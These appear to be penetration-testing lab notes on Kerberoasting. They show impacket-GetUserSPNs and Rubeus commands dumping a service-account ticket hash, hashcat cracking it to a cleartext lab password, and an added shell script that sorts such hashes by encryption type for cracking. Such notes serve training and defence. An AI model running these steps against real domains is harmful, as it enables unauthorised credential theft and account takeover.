Kerberoasting
Recap
When a user wants to access a resource identified by its service principal name (SPN), the client requests a service ticket for that SPN from the Domain Controller (its KDC). The ticket is encrypted with the password hash of the account the SPN is registered to.
Kerberoasting
When a service ticket is requested, the Domain Controller does not check whether the user is actually allowed to use that service; that authorization check is performed afterwards, by the service itself, once the ticket is presented. Any authenticated domain user can therefore obtain a service ticket for any SPN.
If we know the SPN we want to target, we can request the ticket directly from the Domain Controller.
Kerberoasting is requesting such tickets and cracking them offline: because the ticket is encrypted with the service account's password hash, brute force or dictionary guessing against the ticket recovers that account's cleartext password. User accounts with an SPN set are the realistic targets, since machine account passwords are long and random.
Kerberoasting - Impacket-GetUserSPNs
kali@kali:~$ sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ----------- -------- -------------------------- --------- ----------
HTTP/web04.corp.com:80 iis_service 2022-09-07 08:38:43.411468 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427...39d514241eec...
Cracking with Hashcat
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427f7d7befca7abfe9fa79ce4de60$ac1459588a99d36fb31cee7aefb03cd740e9cc6d9816806cc1
...
a96a7e6e29aa173b401935f8f3a476cdbcca8f132e6cc8349dcc88fcd26854e334a2856c009bc76e4e24372c4db4d7f41a8be56e1b6a912c44dd2590522934b:Strawberry1
...
Kerberoasting from Windows
We can use Rubeus on Windows to perform Kerberoasting.
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : iis_service
[*] DistinguishedName : CN=iis_service,CN=Users,DC=corp,DC=com
[*] ServicePrincipalName : HTTP/web04.corp.com:80
[*] PwdLastSet : 9/7/2022 5:38:43 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\hashes.kerberoast
Cracking with Hashcat
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
...
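Rubeus warns above that AES-enabled accounts return AES hashes, and hashcat mode 13100 only handles the RC4 (etype 23) tickets shown in these notes; etype 17 and 18 tickets need modes 19600 and 19700 respectively, and hashcat cannot mix modes in one run. The sh script below is an added example, not part of the original notes or of Rubeus, impacket or hashcat: it reads a dump of $krb5tgs$ lines, sorts them into one file per required hashcat mode, and prints the matching hashcat command for each file. The hashes in it are constructed and truncated (the sql_svc and backup_svc accounts are hypothetical) and will not crack; the mode numbers and the $krb5tgs$<etype>$ prefix are hashcat's real conventions.

```shell
#!/bin/sh
# Added example, not from the original notes: sort a Kerberoast dump by
# encryption type so each file can be fed to the right hashcat mode.
#   etype 23 (RC4-HMAC)   -> hashcat -m 13100
#   etype 17 (AES128-CTS) -> hashcat -m 19600
#   etype 18 (AES256-CTS) -> hashcat -m 19700

# Print the hashcat mode for one $krb5tgs$ line; return 1 for anything else.
krb5tgs_mode() {
    case "$1" in
        '$krb5tgs$23$'*) echo 13100 ;;
        '$krb5tgs$17$'*) echo 19600 ;;
        '$krb5tgs$18$'*) echo 19700 ;;
        *) return 1 ;;
    esac
}

# Account name carried in the hash: the fourth '$'-separated field, minus the
# leading '*' that impacket and Rubeus put in front of RC4 (etype 23) hashes.
krb5tgs_account() {
    printf '%s\n' "$1" | cut -d '$' -f 4 | sed 's/^\*//'
}

# Read $infile line by line and append each hash to "$prefix.<mode>";
# lines that are not recognisable Kerberoast hashes are reported and skipped.
split_by_etype() {
    infile=$1
    prefix=$2
    while IFS= read -r line; do
        mode=$(krb5tgs_mode "$line") || { printf 'skipping: %s\n' "$line" >&2; continue; }
        printf '%s\n' "$line" >> "$prefix.$mode"
    done < "$infile"
}

# One hashcat invocation per output file, with the mode taken from the suffix.
crack_cmds() {
    prefix=$1
    wordlist=$2
    for f in "$prefix".*; do
        [ -e "$f" ] || continue
        echo "hashcat -m ${f##*.} $f $wordlist -r /usr/share/hashcat/rules/best64.rule"
    done
}

# Demo on a constructed dump: ciphertexts are truncated and sql_svc/backup_svc
# are hypothetical accounts, so nothing here is crackable.
tmp=$(mktemp -d)
cat > "$tmp/hashes.kerberoast" <<'EOF'
$krb5tgs$23$*iis_service$CORP.COM$corp.com/iis_service*$21b427f7d7befca7abfe9fa79ce4de60$ac1459588a99d36fb31cee7aefb03cd740e9cc6d
$krb5tgs$18$sql_svc$CORP.COM$5a0b2f5d2c3e4f6a7b8c9d0e$0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c4b5a69788796a5b4c3d2e1f0
$krb5tgs$17$backup_svc$CORP.COM$1122334455667788990011aa$cafef00d0123456789abcdef0123456789abcdef0123456789abcdef01234567
this line is not a hash
EOF
split_by_etype "$tmp/hashes.kerberoast" "$tmp/roast"
for f in "$tmp"/roast.*; do
    while IFS= read -r h; do
        printf '%s -> mode %s\n' "$(krb5tgs_account "$h")" "${f##*.}"
    done < "$f"
done
crack_cmds "$tmp/roast" /usr/share/wordlists/rockyou.txt
rm -rf "$tmp"
```

Run it against a real dump with `split_by_etype hashes.kerberoast roast` and then execute the printed hashcat lines; anything reported as "skipping" on stderr is worth a look, since a mangled line will otherwise silently make hashcat reject the whole file.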